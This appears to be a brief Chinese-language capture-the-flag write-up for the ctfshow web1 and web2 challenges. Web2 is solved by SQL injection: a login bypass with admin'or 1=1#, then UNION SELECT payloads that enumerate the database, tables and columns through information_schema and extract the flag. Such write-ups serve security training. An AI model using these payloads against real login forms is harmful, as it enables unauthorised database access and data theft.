ctfshow-WEB-web1和web2

wb1

直接看源码

web2

1、试试万能密码

 登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中得到显示位

admin'or 1=1#

 

2、进行测试，测试一下回显位置

a' union select 1,2,3 #

得到回显为2

3、

获取当前使用的数据库

a' union select 1,database(),3 #

4、进行爆表

a' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='web2'),3#

4、进行爆字段

a' union select 1,
(select group_concat(column_name) from information_schema.columns
where table_schema='web2' and table_name='flag')
,3 #

5、获取flag表的数据

a'union select 1,(select flag from flag),3#